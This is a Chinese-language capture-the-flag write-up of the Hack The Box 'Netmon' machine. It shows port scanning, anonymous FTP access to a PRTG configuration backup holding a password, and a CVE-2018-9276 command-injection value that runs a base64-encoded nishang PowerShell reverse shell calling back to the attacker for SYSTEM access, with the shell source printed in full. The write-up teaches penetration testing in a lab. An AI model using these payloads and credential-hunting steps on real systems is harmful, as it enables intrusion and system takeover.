Hackthebox - Netmon 靶场实战

admin 2023年1月8日14:06:13评论31 views字数 21519阅读71分43秒阅读模式
靶场信息

Hackthebox - Netmon 靶场实战

靶场类型

Hackthebox - Netmon 靶场实战

信息收集

Nmap

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -sV -A -sC -p- --min-rate 5000 10.10.10.152
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 04:24 CST
Nmap scan report for 10.10.10.152
Host is up (0.49s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/8%OT=21%CT=1%CU=35681%PV=Y%DS=2%DC=T%G=Y%TM=63B9D584
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=A
OS:)OPS(O1=M537NW8ST11%O2=M537NW8ST11%O3=M537NW8NNT11%O4=M537NW8ST11%O5=M53
OS:7NW8ST11%O6=M537ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000
OS:)ECN(R=Y%DF=Y%T=80%W=2000%O=M537NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time: 
|   date: 2023-01-07T20:26:34
|_  start_date: 2023-01-07T20:23:08
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   648.51 ms 10.10.16.1
2   397.22 ms 10.10.10.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.23 seconds

漏洞利用

Ftp

┌──(root㉿kali)-[~/Desktop]
└─# ftp 10.10.10.152                         
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49861|)
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
02-25-19  10:49PM       <DIR>          Windows
226 Transfer complete.

ftp 可以使用匿名账户登录,并且还有一些目录文件

ftp> pwd
Remote directory: /users/Public
ftp> ls
229 Entering Extended Passive Mode (|||49886|)
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
01-07-23  03:23PM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49887|)
125 Data connection already open; Transfer starting.
100% |**********************************************************************************************************************************************************************|    34        0.05 KiB/s    00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.03 KiB/s)

在目录 /users/public 中找到了 user.txt 文件,并且可以 get 请求到本地

┌──(root㉿kali)-[~/Desktop]
└─# cat user.txt
d79ce5330dd16fc989a3fbf6e31f5259

成功拿到 user 权限的 flag 文件

ftp> get license.rtf
local: license.rtf remote: license.rtf
229 Entering Extended Passive Mode (|||50056|)
125 Data connection already open; Transfer starting.
100% |**********************************************************************************************************************************************************************| 50098       48.91 KiB/s    00:00 ETAftp: Reading from network: 被中断的系统调用
  0% |                                                                                                                                                                      |    -1        0.00 KiB/s    --:-- ETA
226 Transfer complete.
ftp> pwd
Remote directory: /windows/system32

在目录 /windows/system32 下成功下载到了 license.rtf 文件,并且成功从该文件中获取到了系统版本 MICROSOFT WINDOWS SERVER 2016 STANDARD AND DATACENTER

找到了一篇文章

https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data

Hackthebox - Netmon 靶场实战

该文章显示 windows server 2016 的 RPTG 默认安装目录在 programdata 中,去查看一下

ftp> cd programdata 
250 CWD command successful.
ftp> cd paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50169|)
125 Data connection already open; Transfer starting.
01-07-23  03:24PM       <DIR>          PRTG Network Monitor
226 Transfer complete.

确实存在

ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50179|)
150 Opening ASCII mode data connection.
01-07-23  03:24PM       <DIR>          Configuration Auto-Backups
01-07-23  03:24PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
01-07-23  03:24PM       <DIR>          Logs (Web Server)
01-07-23  03:24PM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
01-07-23  03:24PM              1632703 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||50302|)
125 Data connection already open; Transfer starting.
  7% |***********                                                                                                                                                           | 88641       86.52 KiB/s    00:12 ETAftp: Reading from network: 被中断的系统调用
  0% |                                                                                                                                                                      |    -1        0.00 KiB/s    --:-- ETA
550 The specified network name is no longer available.

获取文件 Configuration.old.bak

grep -B5 -A5 -i password RPTG Configuration.dat.bak|sed 's/ //g'|sort -u|less

在该文件中,我们找到了一串疑似密码的玩意儿

<proxyport>
        PrTg@dmin2018
<retrysnmp>
        <!--User:prtgadmin-->
Hackthebox - Netmon 靶场实战

但是拿去 web 页面中登录却又失败了

02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
01-07-23  03:24PM              1632703 PRTG Graph Data Cache.dat

突然想到,这个文件是在 2018 年创建的,那么会不会根据年份变化呢?

username = prtgadmin
password = PrTg@dmin2019

去尝试一下

Hackthebox - Netmon 靶场实战

nice,成功登录

权限提升

Hackthebox - Netmon 靶场实战

在找参考文章和漏洞的时候,倒是遇到个小插曲。这里因为我的节点是俄罗斯的,有一些文章直接无法访问,绝了

https://github.com/A1vinSmith/CVE-2018-9276

合理找到了一个命令注入的漏洞以及利用工具

这个原理是 Netmon 在执行通知脚本时,因为没有执行参数检查而导致的命令注入漏洞

点击 `Setup -> Notifications -> Ticket Notification -> Execute Program

Hackthebox - Netmon 靶场实战

这里就是我们利用的地方

但是在利用之前我们要先做点准备

https://github.com/samratashok/nishang

首先使用 nishang 的程序

┌──(root㉿kali)-[~/Desktop]
└─# cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .

将我们需要的脚本复制到本地

nc -nvlp 4444

使用 nc 监听一个端口

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -Port 4444

将上面的语句添加到 Invoke-PowerShellTcp.ps1 的最下面

接着将内容转化为 base64

cat Invoke-PowerShellTcp.ps1|iconv -t UTF-16LE|base64 -w0

然后构造一下恶意 poc

test|powershell -enc f u n c t i o n   I n v o k e - P o w e r S h e l l T c p   
 {   
 < # 
 . S Y N O P S I S 
 N i s h a n g   s c r i p t   w h i c h   c a n   b e   u s e d   f o r   R e v e r s e   o r   B i n d   i n t e r a c t i v e   P o w e r S h e l l   f r o m   a   t a r g e t .   
 
 . D E S C R I P T I O N 
 T h i s   s c r i p t   i s   a b l e   t o   c o n n e c t   t o   a   s t a n d a r d   n e t c a t   l i s t e n i n g   o n   a   p o r t   w h e n   u s i n g   t h e   - R e v e r s e   s w i t c h .   
 A l s o ,   a   s t a n d a r d   n e t c a t   c a n   c o n n e c t   t o   t h i s   s c r i p t   B i n d   t o   a   s p e c i f i c   p o r t . 
 
 T h e   s c r i p t   i s   d e r i v e d   f r o m   P o w e r f u n   w r i t t e n   b y   B e n   T u r n e r   &   D a v e   H a r d y 
 
 . P A R A M E T E R   I P A d d r e s s 
 T h e   I P   a d d r e s s   t o   c o n n e c t   t o   w h e n   u s i n g   t h e   - R e v e r s e   s w i t c h . 
 
 . P A R A M E T E R   P o r t 
 T h e   p o r t   t o   c o n n e c t   t o   w h e n   u s i n g   t h e   - R e v e r s e   s w i t c h .   W h e n   u s i n g   - B i n d   i t   i s   t h e   p o r t   o n   w h i c h   t h i s   s c r i p t   l i s t e n s . 
 
 . E X A M P L E 
 P S   >   I n v o k e - P o w e r S h e l l T c p   - R e v e r s e   - I P A d d r e s s   1 9 2 . 1 6 8 . 2 5 4 . 2 2 6   - P o r t   4 4 4 4 
 
 A b o v e   s h o w s   a n   e x a m p l e   o f   a n   i n t e r a c t i v e   P o w e r S h e l l   r e v e r s e   c o n n e c t   s h e l l .   A   n e t c a t / p o w e r c a t   l i s t e n e r   m u s t   b e   l i s t e n i n g   o n   
 t h e   g i v e n   I P   a n d   p o r t .   
 
 . E X A M P L E 
 P S   >   I n v o k e - P o w e r S h e l l T c p   - B i n d   - P o r t   4 4 4 4 
 
 A b o v e   s h o w s   a n   e x a m p l e   o f   a n   i n t e r a c t i v e   P o w e r S h e l l   b i n d   c o n n e c t   s h e l l .   U s e   a   n e t c a t / p o w e r c a t   t o   c o n n e c t   t o   t h i s   p o r t .   
 
 . E X A M P L E 
 P S   >   I n v o k e - P o w e r S h e l l T c p   - R e v e r s e   - I P A d d r e s s   f e 8 0 : : 2 0 c : 2 9 f f : f e 9 d : b 9 8 3   - P o r t   4 4 4 4 
 
 A b o v e   s h o w s   a n   e x a m p l e   o f   a n   i n t e r a c t i v e   P o w e r S h e l l   r e v e r s e   c o n n e c t   s h e l l   o v e r   I P v 6 .   A   n e t c a t / p o w e r c a t   l i s t e n e r   m u s t   b e 
 l i s t e n i n g   o n   t h e   g i v e n   I P   a n d   p o r t .   
 
 . L I N K 
 h t t p : / / w w w . l a b o f a p e n e t r a t i o n t e s t e r . c o m / 2 0 1 5 / 0 5 / w e e k - o f - p o w e r s h e l l - s h e l l s - d a y - 1 . h t m l 
 h t t p s : / / g i t h u b . c o m / n e t t i t u d e / p o w e r s h e l l / b l o b / m a s t e r / p o w e r f u n . p s 1 
 h t t p s : / / g i t h u b . c o m / s a m r a t a s h o k / n i s h a n g 
 # >             
         [ C m d l e t B i n d i n g ( D e f a u l t P a r a m e t e r S e t N a m e = " r e v e r s e " ) ]   P a r a m ( 
 
                 [ P a r a m e t e r ( P o s i t i o n   =   0 ,   M a n d a t o r y   =   $ t r u e ,   P a r a m e t e r S e t N a m e = " r e v e r s e " ) ] 
                 [ P a r a m e t e r ( P o s i t i o n   =   0 ,   M a n d a t o r y   =   $ f a l s e ,   P a r a m e t e r S e t N a m e = " b i n d " ) ] 
                 [ S t r i n g ] 
                 $ I P A d d r e s s , 
 
                 [ P a r a m e t e r ( P o s i t i o n   =   1 ,   M a n d a t o r y   =   $ t r u e ,   P a r a m e t e r S e t N a m e = " r e v e r s e " ) ] 
                 [ P a r a m e t e r ( P o s i t i o n   =   1 ,   M a n d a t o r y   =   $ t r u e ,   P a r a m e t e r S e t N a m e = " b i n d " ) ] 
                 [ I n t ] 
                 $ P o r t , 
 
                 [ P a r a m e t e r ( P a r a m e t e r S e t N a m e = " r e v e r s e " ) ] 
                 [ S w i t c h ] 
                 $ R e v e r s e , 
 
                 [ P a r a m e t e r ( P a r a m e t e r S e t N a m e = " b i n d " ) ] 
                 [ S w i t c h ] 
                 $ B i n d 
 
         ) 
 
         
         t r y   
         { 
                 # C o n n e c t   b a c k   i f   t h e   r e v e r s e   s w i t c h   i s   u s e d . 
                 i f   ( $ R e v e r s e ) 
                 { 
                         $ c l i e n t   =   N e w - O b j e c t   S y s t e m . N e t . S o c k e t s . T C P C l i e n t ( $ I P A d d r e s s , $ P o r t ) 
                 } 
 
                 # B i n d   t o   t h e   p r o v i d e d   p o r t   i f   B i n d   s w i t c h   i s   u s e d . 
                 i f   ( $ B i n d ) 
                 { 
                         $ l i s t e n e r   =   [ S y s t e m . N e t . S o c k e t s . T c p L i s t e n e r ] $ P o r t 
                         $ l i s t e n e r . s t a r t ( )         
                         $ c l i e n t   =   $ l i s t e n e r . A c c e p t T c p C l i e n t ( ) 
                 }   
 
                 $ s t r e a m   =   $ c l i e n t . G e t S t r e a m ( ) 
                 [ b y t e [ ] ] $ b y t e s   =   0 . . 6 5 5 3 5 | % { 0 } 
 
                 # S e n d   b a c k   c u r r e n t   u s e r n a m e   a n d   c o m p u t e r n a m e 
                 $ s e n d b y t e s   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( " W i n d o w s   P o w e r S h e l l   r u n n i n g   a s   u s e r   "   +   $ e n v : u s e r n a m e   +   "   o n   "   +   $ e n v : c o m p u t e r n a m e   +   " ` n C o p y r i g h t   ( C )   2 0 1 5   M i c r o s o f t   C o r p o r a t i o n .   A l l   r i g h t s   r e s e r v e d . ` n ` n " ) 
                 $ s t r e a m . W r i t e ( $ s e n d b y t e s , 0 , $ s e n d b y t e s . L e n g t h ) 
 
                 # S h o w   a n   i n t e r a c t i v e   P o w e r S h e l l   p r o m p t 
                 $ s e n d b y t e s   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( ' P S   '   +   ( G e t - L o c a t i o n ) . P a t h   +   ' > ' ) 
                 $ s t r e a m . W r i t e ( $ s e n d b y t e s , 0 , $ s e n d b y t e s . L e n g t h ) 
 
                 w h i l e ( ( $ i   =   $ s t r e a m . R e a d ( $ b y t e s ,   0 ,   $ b y t e s . L e n g t h ) )   - n e   0 ) 
                 { 
                         $ E n c o d e d T e x t   =   N e w - O b j e c t   - T y p e N a m e   S y s t e m . T e x t . A S C I I E n c o d i n g 
                         $ d a t a   =   $ E n c o d e d T e x t . G e t S t r i n g ( $ b y t e s , 0 ,   $ i ) 
                         t r y 
                         { 
                                 # E x e c u t e   t h e   c o m m a n d   o n   t h e   t a r g e t . 
                                 $ s e n d b a c k   =   ( I n v o k e - E x p r e s s i o n   - C o m m a n d   $ d a t a   2 > & 1   |   O u t - S t r i n g   ) 
                         } 
                         c a t c h 
                         { 
                                 W r i t e - W a r n i n g   " S o m e t h i n g   w e n t   w r o n g   w i t h   e x e c u t i o n   o f   c o m m a n d   o n   t h e   t a r g e t . "   
                                 W r i t e - E r r o r   $ _ 
                         } 
                         $ s e n d b a c k 2     =   $ s e n d b a c k   +   ' P S   '   +   ( G e t - L o c a t i o n ) . P a t h   +   ' >   ' 
                         $ x   =   ( $ e r r o r [ 0 ]   |   O u t - S t r i n g ) 
                         $ e r r o r . c l e a r ( ) 
                         $ s e n d b a c k 2   =   $ s e n d b a c k 2   +   $ x 
 
                         # R e t u r n   t h e   r e s u l t s 
                         $ s e n d b y t e   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( $ s e n d b a c k 2 ) 
                         $ s t r e a m . W r i t e ( $ s e n d b y t e , 0 , $ s e n d b y t e . L e n g t h ) 
                         $ s t r e a m . F l u s h ( )     
                 } 
                 $ c l i e n t . C l o s e ( ) 
                 i f   ( $ l i s t e n e r ) 
                 { 
                         $ l i s t e n e r . S t o p ( ) 
                 } 
         } 
         c a t c h 
         { 
                 W r i t e - W a r n i n g   " S o m e t h i n g   w e n t   w r o n g !   C h e c k   i f   t h e   s e r v e r   i s   r e a c h a b l e   a n d   y o u   a r e   u s i n g   t h e   c o r r e c t   p o r t . "   
                 W r i t e - E r r o r   $ _ 
         } 
 } 
 
 I n v o k e - P o w e r S h e l l T c p   - R e v e r s e   - I P A d d r e s s   1 0 . 1 0 . 1 6 . 2   - P o r t   4 4 4 4 
 
Hackthebox - Netmon 靶场实战
Hackthebox - Netmon 靶场实战

然后点击右边的小铃铛运行

┌──(root㉿kali)-[/opt/nishang]
└─# nc -nvlp 4444                                        
listening on [any] 4444 ...
connect to [10.10.16.2] from (UNKNOWN) [10.10.10.152] 51165
Windows PowerShell running as user NETMON$ on NETMON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:Windowssystem32>whoami
nt authoritysystem

成功拿到 system 权限

PS C:usersadministratordesktop> cat root.txt
e8d8f9949c60a0501831df4efa8613bc

成功拿到 root 权限的 flag 文件


原文始发于微信公众号(路西菲尔的故事汇):Hackthebox - Netmon 靶场实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月8日14:06:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hackthebox - Netmon 靶场实战http://cn-sec.com/archives/1505902.html

发表评论

匿名网友 填写信息